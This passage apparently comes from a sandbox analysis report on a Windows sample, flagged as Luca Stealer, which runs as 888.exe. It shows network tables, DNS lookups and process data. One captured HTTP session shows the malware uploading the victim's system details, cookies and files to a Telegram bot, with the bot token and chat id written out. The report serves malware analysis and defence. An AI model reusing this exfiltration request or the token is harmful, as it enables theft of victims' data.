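if __name__ == "__main__":
    for remote, f in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{remote[0]}:{remote[1]}  out={f['out']} in={f['in']}  "
              f"first={f['first_seen']}  {classify(remote)}")
```

The ephemeral-port rule is what resolves rows such as 8049708: (80, 49708) survives because the VM side is 49708, while (804, 9708) and (8049, 708) put a low port on the VM and are discarded. Feeding the whole table through summarize gives one line per remote endpoint, which is the view you want before deciding which of the two destinations is the exfiltration channel and which is the IP-check.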
Timestamp                              Src Port  Dst Port  Source IP        Dest IP
Dec 13, 2024 12:40:16.915498018 CET    49708     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:17.035352945 CET    80        49708     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:17.035475016 CET    49708     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:17.036777973 CET    49708     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:17.156992912 CET    80        49708     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:18.707910061 CET    80        49708     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:18.714674950 CET    49708     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:18.834839106 CET    80        49708     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:18.834912062 CET    49708     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:53.858319998 CET    49796     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:53.978290081 CET    80        49796     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:53.978374004 CET    49796     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:53.978924990 CET    49796     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:54.099622011 CET    80        49796     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:55.642307997 CET    80        49796     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:55.648334980 CET    49796     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:40:55.768578053 CET    80        49796     108.181.61.49    192.168.2.10
Dec 13, 2024 12:40:55.768655062 CET    49796     80        192.168.2.10     108.181.61.49
Dec 13, 2024 12:41:05.257632971 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:05.257678986 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:05.257850885 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:05.414583921 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:05.414599895 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.781860113 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.781975031 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.785275936 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.785284042 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.785542011 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.825799942 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872076035 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872145891 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872278929 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872313023 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872390032 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872415066 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872430086 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872518063 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872538090 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872540951 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872559071 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872582912 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872606993 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872612953 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872627020 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872675896 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872684002 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872700930 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872714996 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872807026 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872813940 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872828960 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872838974 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872853041 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872859001 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872869015 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872876883 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872889042 CET    49825     443       192.168.2.10     149.154.167.220
Dec 13, 2024 12:41:06.872895956 CET    443       49825     149.154.167.220  192.168.2.10
Dec 13, 2024 12:41:06.872903109 CET    49825     443       192.168.2.10     149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872906923 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872917891 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872921944 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872932911 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872944117 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872958899 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872971058 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872989893 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873003960 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873011112 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873017073 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873049021 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873090982 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873117924 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873198986 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873214006 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919328928 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.919508934 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919601917 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919610023 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919629097 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919650078 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919682980 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919718981 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919740915 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919759035 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.963323116 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.967273951 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967328072 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967343092 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967365980 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967375040 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967407942 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967421055 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967428923 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967439890 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967463970 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011327982 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.011521101 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011554003 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011677027 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011708021 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011744022 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011771917 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011780024 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.015983105 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.016130924 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.016233921 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016762018 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016807079 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016841888 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016854048 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.063328981 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.112811089 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.114501953 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.114523888 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.232933998 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.353765965 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:09.857706070 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:09.857876062 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:09.858275890 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:09.860017061 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:09.860033989 CET44349825149.154.167.220192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 12:40:16.757639885 CET | 65390 | 53 | 192.168.2.10 | 1.1.1.1
Dec 13, 2024 12:40:16.895631075 CET | 53 | 65390 | 1.1.1.1 | 192.168.2.10
Dec 13, 2024 12:40:53.719352007 CET | 54360 | 53 | 192.168.2.10 | 1.1.1.1
Dec 13, 2024 12:40:53.857197046 CET | 53 | 54360 | 1.1.1.1 | 192.168.2.10
Dec 13, 2024 12:41:05.055191994 CET | 50547 | 53 | 192.168.2.10 | 1.1.1.1
Dec 13, 2024 12:41:05.192477942 CET | 53 | 50547 | 1.1.1.1 | 192.168.2.10

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 12:40:16.757639885 CET | 192.168.2.10 | 1.1.1.1 | 0x42ef | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:40:53.719352007 CET | 192.168.2.10 | 1.1.1.1 | 0x7b0f | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:41:05.055191994 CET | 192.168.2.10 | 1.1.1.1 | 0x2b0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 12:40:14.065551043 CET | 1.1.1.1 | 192.168.2.10 | 0x8ab3 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 12:40:14.065551043 CET | 1.1.1.1 | 192.168.2.10 | 0x8ab3 | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:40:16.895631075 CET | 1.1.1.1 | 192.168.2.10 | 0x42ef | No error (0) | ipwho.is | - | 108.181.61.49 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:40:53.857197046 CET | 1.1.1.1 | 192.168.2.10 | 0x7b0f | No error (0) | ipwho.is | - | 108.181.61.49 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:41:05.192477942 CET | 1.1.1.1 | 192.168.2.10 | 0x2b0 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false

• api.telegram.org
• ipwho.is

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 108.181.61.49 | 80 | 7888 | C:\Users\user\Desktop\888.exe

Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 12:40:17.036777973 CET | 59 | OUT | GET /?output=json HTTP/1.1
accept: */*
host: ipwho.is
Dec 13, 2024 12:40:18.707910061 CET | 943 | IN | HTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 11:40:18 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:40:18-05:00"}}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49796 | 108.181.61.49 | 80 | 7888 | C:\Users\user\Desktop\888.exe

Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 12:40:53.978924990 CET | 59 | OUT | GET /?output=json HTTP/1.1
accept: */*
host: ipwho.is
Dec 13, 2024 12:40:55.642307997 CET | 943 | IN | HTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 11:40:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:40:55-05:00"}}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49825 | 149.154.167.220 | 443 | 7888 | C:\Users\user\Desktop\888.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-13 11:41:06 UTC | 1272 | OUT | POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Pas [TRUNCATED]
content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812a
content-length: 889952
accept: */*
host: api.telegram.org
2024-12-13 11:41:06 UTC | 15112 | OUT | Data Ascii: --2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812aContent-Disposition: form-data; name="document"; filename="[US]_8.46.123.189_user-PC.zip"Content-Type: application/zipPKLkYAutofill/PKLkY
                                                                      2024-12-13 11:41:09 UTC389INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Fri, 13 Dec 2024 11:41:09 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 1222
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection



                                                                      Target ID:0
                                                                      Start time:06:40:16
                                                                      Start date:13/12/2024
                                                                      Path:C:\Users\user\Desktop\888.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\888.exe"
                                                                      Imagebase:0xa50000
                                                                      File size:4'885'504 bytes
                                                                      MD5 hash:B6E5859C20C608BF7E23A9B4F8B3B699
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:06:40:55
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                                      Imagebase:0x5a0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:06:40:55
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff620390000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:2.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:13.2%
                                                                        Total number of Nodes:642
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 1823 a71280 1824 a712a5 1823->1824 1825 a71293 RtlReAllocateHeap 1823->1825 1827 a712b0 GetProcessHeap 1824->1827 1828 a712bf HeapAlloc 1824->1828 1826 a71305 1825->1826 1827->1826 1829 a712ba 1827->1829 1828->1826 1830 a712d1 1828->1830 1829->1828 1831 a712ef HeapFree 1830->1831 1831->1826 1832 c79d40 SetThreadStackGuarantee 1833 c79d82 GetLastError 1832->1833 1835 c79d8c 1832->1835 1834 c79df7 1833->1834 1833->1835 1844 d9bef0 1834->1844 1837 c79dd1 HeapFree 1835->1837 1840 c79dc2 HeapFree 1835->1840 1840->1837 1847 c7e9e0 1844->1847 1848 c7e9fe 1847->1848 1849 c7e9ea 1847->1849 1872 c7ea20 1848->1872 1853 d9c040 1849->1853 1854 d9bef0 78 API calls 1853->1854 1855 d9c07f 1854->1855 1875 d9c0b0 1855->1875 1891 c7ea30 1872->1891 1876 d9c108 1875->1876 1877 d9c167 1875->1877 1878 d9bef0 78 API calls 1876->1878 1879 d9bef0 78 API calls 1877->1879 1878->1877 1880 d9c1f6 1879->1880 1881 d9bef0 78 API calls 1880->1881 1882 d9c25f 1881->1882 1883 d9bef0 78 API calls 1882->1883 1884 d9c2a6 1883->1884 1885 d9bef0 78 API calls 1884->1885 1886 d9c2f6 1885->1886 1887 d9bef0 78 API calls 1886->1887 1888 d9c371 1887->1888 1889 d9bef0 78 API calls 1888->1889 1890 d9c3cf 1889->1890 1893 c7ea6d 1891->1893 1892 c7eaaf 1894 c7eb20 77 API calls 1892->1894 1893->1892 1899 c7eb20 1893->1899 1896 c7eae2 1894->1896 1897 c7ea25 1896->1897 1898 c7eb00 HeapFree 1896->1898 1898->1897 1900 c7eb77 1899->1900 1946 c7f06a 1899->1946 1950 c63bc0 1900->1950 1901 c61d20 2 API calls 1903 c7f0e5 1901->1903 1906 c61e80 2 API calls 1903->1906 1904 c7eb80 1905 c7eba1 1904->1905 1974 d9c300 1904->1974 1908 c7f0f0 1905->1908 1909 c7ebab AcquireSRWLockShared 1905->1909 1911 c7f13d 1906->1911 1910 c61d20 2 API calls 1908->1910 1912 c7ebfb 1909->1912 1945 c7ec92 1909->1945 1910->1903 1913 c7f171 1911->1913 1916 c62260 2 API calls 1911->1916 1914 c7ec27 1912->1914 1915 c7edcc 1912->1915 1913->1892 1914->1945 1979 c62420 
1914->1979 1917 c63bc0 74 API calls 1915->1917 1916->1913 1918 c7edd5 1917->1918 1920 c7ede3 1918->1920 1918->1945 1919 c7ed7d ReleaseSRWLockShared 1921 c63bc0 74 API calls 1919->1921 1922 d9c300 74 API calls 1920->1922 1921->1945 1933 c7edc4 1922->1933 1925 c7eda3 1926 d9c300 74 API calls 1925->1926 1926->1933 1928 da6bb0 74 API calls 1928->1933 1931 c7ef5a AcquireSRWLockExclusive 1934 c7ef76 1931->1934 1935 c7ef7f 1931->1935 1933->1928 1936 c7efcd ReleaseSRWLockExclusive 1933->1936 1943 c7f053 1933->1943 1947 b3d250 2 API calls 1933->1947 1948 d9c300 74 API calls 1933->1948 1941 c7df60 74 API calls 1934->1941 2054 da6bb0 1935->2054 1939 c6fde0 74 API calls 1936->1939 1937 c7ef16 1940 d9c300 74 API calls 1937->1940 1939->1933 1940->1933 1941->1933 1943->1946 1949 b3d250 2 API calls 1943->1949 1945->1919 1945->1925 1945->1931 1945->1933 1945->1937 1986 c7df60 1945->1986 1999 c62260 1945->1999 2005 b3d250 1945->2005 2010 c61d20 1945->2010 2015 c61e80 1945->2015 2020 c71340 1945->2020 2022 c6fde0 1945->2022 1946->1901 1947->1933 1948->1933 1949->1946 1951 c63bce TlsGetValue 1950->1951 1952 c63c58 1950->1952 1955 c63bdb 1951->1955 2069 da6800 1952->2069 1956 c63be1 1955->1956 1957 c63bef TlsGetValue 1955->1957 1958 da6800 74 API calls 1955->1958 1956->1904 1960 c63c54 1957->1960 1961 c63bfc 1957->1961 1958->1957 1960->1904 1962 c63c3d 1961->1962 2063 a71220 1961->2063 1962->1904 1965 c63c82 2086 d9bae0 1965->2086 1966 c63c1c 1967 c63c34 TlsSetValue 1966->1967 1970 da6800 74 API calls 1966->1970 1967->1962 1970->1967 1971 c63d09 1971->1904 1972 c63c91 1972->1971 1973 c63cfa HeapFree 1972->1973 1973->1971 1975 d9bef0 78 API calls 1974->1975 1976 d9c371 1975->1976 1977 d9bef0 78 API calls 1976->1977 1978 d9c3cf 1977->1978 2333 c626e0 1979->2333 1981 c62452 1983 c6246a 1981->1983 2362 c61b80 1981->2362 1983->1945 1984 c62465 1984->1983 1985 d9bef0 78 API calls 1984->1985 1985->1983 1992 c7dfeb 1986->1992 1987 c7e05b 1988 c7e1a6 1987->1988 1989 c7e131 1987->1989 1990 
c7e07b 1987->1990 1997 c7e08f 1987->1997 1988->1945 1993 c7e830 74 API calls 1989->1993 2418 c7e830 AcquireSRWLockExclusive 1990->2418 1991 c7e04a HeapFree 1991->1987 1992->1987 1992->1991 1995 c7e03b HeapFree 1992->1995 1993->1997 1995->1991 1996 c7e195 HeapFree 1996->1988 1997->1988 1997->1996 1998 c7e186 HeapFree 1997->1998 1998->1996 2000 c62282 1999->2000 2001 c6226a 1999->2001 2003 c6229c 2000->2003 2004 c6228d HeapFree 2000->2004 2001->2000 2002 c62273 HeapFree 2001->2002 2002->2000 2003->1945 2004->2003 2006 b3d26a 2005->2006 2007 b3d259 HeapFree 2005->2007 2008 b3d284 2006->2008 2009 b3d275 HeapFree 2006->2009 2007->2006 2008->1945 2009->2008 2011 c61d70 2010->2011 2012 c61d7a 2011->2012 2013 c61de7 HeapFree 2011->2013 2014 c61dd8 HeapFree 2011->2014 2012->1945 2013->2012 2014->2013 2016 c61f08 2015->2016 2018 c61eb2 2015->2018 2016->1945 2017 c61ef9 HeapFree 2017->2016 2018->2017 2019 c61eea HeapFree 2018->2019 2019->2017 2425 c7134f 2020->2425 2023 c6fdef TlsGetValue 2022->2023 2024 c6fe98 2022->2024 2027 c6fdfc 2023->2027 2026 da6800 72 API calls 2024->2026 2026->2023 2028 c6fe04 2027->2028 2029 c6fe19 TlsGetValue 2027->2029 2030 da6800 72 API calls 2027->2030 2028->1945 2029->2028 2032 c6fe26 2029->2032 2030->2029 2033 a71220 3 API calls 2032->2033 2037 c6fe67 2032->2037 2034 c6fe42 2033->2034 2035 c6fe46 2034->2035 2036 c6fec2 2034->2036 2038 c6fe5e TlsSetValue 2035->2038 2041 da6800 72 API calls 2035->2041 2039 d9bae0 72 API calls 2036->2039 2037->2028 2040 b3d250 2 API calls 2037->2040 2038->2037 2043 c6fed1 2039->2043 2040->2028 2041->2038 2044 c6ff18 TlsSetValue 2043->2044 2046 da6800 72 API calls 2043->2046 2047 c6ff59 HeapFree 2044->2047 2050 c6ff45 2044->2050 2046->2044 2048 c6ff71 2047->2048 2049 c6ff6e 2047->2049 2052 da6800 72 API calls 2048->2052 2051 c6ff83 TlsSetValue 2049->2051 2050->2047 2053 b3d250 2 API calls 2050->2053 2051->1945 2052->2051 2053->2047 2055 c63bc0 78 API calls 2054->2055 2056 da6bb6 2055->2056 2057 da6bba 2056->2057 
2058 d9c300 78 API calls 2056->2058 2057->1934 2059 da6be0 2058->2059 2060 da6bea 2059->2060 2458 da6430 2059->2458 2060->1934 2062 da6c26 2062->1934 2064 a71240 GetProcessHeap 2063->2064 2065 a7122f 2063->2065 2064->2065 2068 a71264 2064->2068 2066 a71254 RtlAllocateHeap 2065->2066 2067 a71234 RtlAllocateHeap 2065->2067 2066->2068 2067->2068 2068->1965 2068->1966 2070 da680e InitOnceBeginInitialize 2069->2070 2071 da6881 TlsAlloc 2069->2071 2072 da68bc 2070->2072 2073 da6835 2070->2073 2074 da691b 2071->2074 2075 da6893 2071->2075 2129 da6950 2072->2129 2077 da683c TlsAlloc 2073->2077 2079 da689e 2073->2079 2132 da6980 2074->2132 2075->2079 2080 da68a7 TlsFree 2075->2080 2081 da68da InitOnceComplete 2077->2081 2082 da684b InitOnceComplete 2077->2082 2079->1951 2080->2079 2084 d9bef0 72 API calls 2081->2084 2082->2079 2084->2074 2135 a71340 2086->2135 2088 d9bb60 2173 a6e560 2088->2173 2090 d9bb65 2090->1972 2091 d9baeb 2091->2088 2167 a6e630 2091->2167 2094 d9bb70 2095 d9bae0 77 API calls 2094->2095 2096 d9bb79 2095->2096 2097 d9bef0 77 API calls 2096->2097 2098 d9bbdf 2097->2098 2099 d9bef0 77 API calls 2098->2099 2100 d9bc3f 